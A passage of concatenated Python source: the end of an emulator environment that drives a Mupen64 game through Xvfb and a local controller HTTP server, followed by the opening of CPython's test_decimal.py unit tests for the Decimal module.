self._stop_controller_server()
def _start_controller_server(self):
server = ControllerHTTPServer(('', config['PORT_NUMBER']),
config['ACTION_TIMEOUT'])
server_thread = threading.Thread(target=server.serve_forever, args=())
server_thread.daemon = True
server_thread.start()
print('ControllerHTTPServer started on port ', config['PORT_NUMBER'])
return server, server_thread
def _stop_controller_server(self):
#cprint('Stop Controller Server called!', 'yellow')
if hasattr(self, 'controller_server'):
self.controller_server.shutdown()
def _start_emulator(self,
rom_name,
res_w=config['SCR_W'],
res_h=config['SCR_H'],
res_d=config['SCR_D'],
input_driver_path=config['INPUT_DRIVER_PATH']):
rom_path = os.path.abspath(
os.path.join(os.path.dirname(inspect.stack()[0][1]),
'../ROMs',
rom_name))
if not os.path.isfile(rom_path):
msg = "ROM not found: " + rom_path
cprint(msg, 'red')
raise Exception(msg)
input_driver_path = os.path.abspath(os.path.expanduser(input_driver_path))
if not os.path.isfile(input_driver_path):
msg = "Input driver not found: " + input_driver_path
cprint(msg, 'red')
raise Exception(msg)
cmd = [config['MUPEN_CMD'],
"--resolution",
"%ix%i" % (res_w, res_h),
"--audio", "dummy",
"--input",
input_driver_path,
rom_path]
initial_disp = os.environ["DISPLAY"]
cprint('Initially on DISPLAY %s' % initial_disp, 'red')
xvfb_proc = None
if config['USE_XVFB']:
display_num = 0
success = False
# If we couldn't find an open display number after 15 attempts, give up
while not success and display_num <= 15:
display_num += 1
xvfb_cmd = [config['XVFB_CMD'],
":" + str(display_num),
"-screen",
"0",
"%ix%ix%i" % (res_w, res_h, res_d * 8),
"-fbdir",
config['TMP_DIR']]
cprint('Starting xvfb with command: %s' % xvfb_cmd, 'yellow')
xvfb_proc = subprocess.Popen(xvfb_cmd, shell=False, stderr=subprocess.STDOUT)
time.sleep(2) # Give xvfb a couple seconds to start up
# Poll the process to see if it exited early
# (most likely due to a server already active on the display_num)
if xvfb_proc.poll() is None:
success = True
print('')
if not success:
msg = "Failed to initialize Xvfb!"
cprint(msg, 'red')
raise Exception(msg)
os.environ["DISPLAY"] = ":" + str(display_num)
cprint('Using DISPLAY %s' % os.environ["DISPLAY"], 'blue')
cprint('Changed to DISPLAY %s' % os.environ["DISPLAY"], 'red')
cmd = [config['VGLRUN_CMD']] + cmd
cprint('Starting emulator with comand: %s' % cmd, 'yellow')
emulator_process = subprocess.Popen(cmd,
env=os.environ.copy(),
shell=False,
stderr=subprocess.STDOUT)
# TODO: Test and cleanup:
# May need to initialize this after the DISPLAY env var has been set
# so it attaches to the correct X display; otherwise screenshots may
# come from the wrong place. This used to be true when we were using
# wxPython for screenshots. Untested after switching to mss.
cprint('Calling mss.mss() with DISPLAY %s' % os.environ["DISPLAY"], 'red')
self.mss_grabber = mss.mss()
time.sleep(2) # Give mss a couple seconds to initialize; also may not be necessary
# Restore the DISPLAY env var
os.environ["DISPLAY"] = initial_disp
cprint('Changed back to DISPLAY %s' % os.environ["DISPLAY"], 'red')
emu_mon = EmulatorMonitor()
monitor_thread = threading.Thread(target=emu_mon.monitor_emulator,
args=[emulator_process])
monitor_thread.daemon = True
monitor_thread.start()
return xvfb_proc, emulator_process
def _kill_emulator(self):
#cprint('Kill Emulator called!', 'yellow')
try:
self._act(ControllerState.NO_OP)
if self.emulator_process is not None:
self.emulator_process.kill()
if self.xvfb_process is not None:
self.xvfb_process.terminate()
except AttributeError:
pass # We may be shut down during intialization before these attributes have been set
###############################################
class EmulatorMonitor:
def monitor_emulator(self, emulator):
emu_return = emulator.poll()
while emu_return is None:
time.sleep(2)
emu_return = emulator.poll()
# TODO: this means our environment died... need to die too
print('Emulator closed with code: ' + str(emu_return))
###############################################
class ControllerState(object):
# Controls
NO_OP = [0, 0, 0, 0, 0]
A_BUTTON = [0, 0, 1, 0, 0]
B_BUTTON = [0, 0, 0, 1, 0]
RB_BUTTON = [0, 0, 0, 0, 1]
JOYSTICK_UP = [0, 80, 0, 0, 0]
JOYSTICK_DOWN = [0, -80, 0, 0, 0]
JOYSTICK_LEFT = [-80, 0, 0, 0, 0]
JOYSTICK_RIGHT = [80, 0, 0, 0, 0]
def __init__(self, controls=NO_OP, start_button=0):
self.START_BUTTON = start_button
self.X_AXIS = controls[0]
self.Y_AXIS = controls[1]
self.A_BUTTON = controls[2]
self.B_BUTTON = controls[3]
self.R_TRIG = controls[4]
self.L_TRIG = 0
self.Z_TRIG = 0
def to_json(self):
return json.dumps(self.__dict__)
###############################################
class ControllerHTTPServer(HTTPServer, object):
def __init__(self, server_address, control_timeout):
self.control_timeout = control_timeout
self.controls = ControllerState()
self.hold_response = True
self.running = True
super(ControllerHTTPServer, self).__init__(server_address, self.ControllerRequestHandler)
def send_controls(self, controls, start_button=0):
#print('Send controls called')
self.controls = ControllerState(controls, start_button)
self.hold_response = False
# Wait for controls to be sent:
start = time.time()
while not self.hold_response and time.time() < start + self.control_timeout:
time.sleep(MILLISECOND)
def shutdown(self):
self.running = False
super(ControllerHTTPServer, self).shutdown()
class ControllerRequestHandler(BaseHTTPRequestHandler, object):
def log_message(self, format, *args):
pass
def write_response(self, resp_code, resp_data):
self.send_response(resp_code)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(resp_data)
def do_GET(self):
while self.server.running and self.server.hold_response:
time.sleep(MILLISECOND)
if not self.server.running:
print('Sending SHUTDOWN response')
# TODO: This sometimes fails with a broken pipe because
# the emulator has already stopped. Should handle gracefully
self.write_response(500, "SHUTDOWN")
### respond with controller output
self.write_response(200, self.server.controls.to_json())
self.server.hold_response = True
return
###############################################
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import inspect
import threading
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
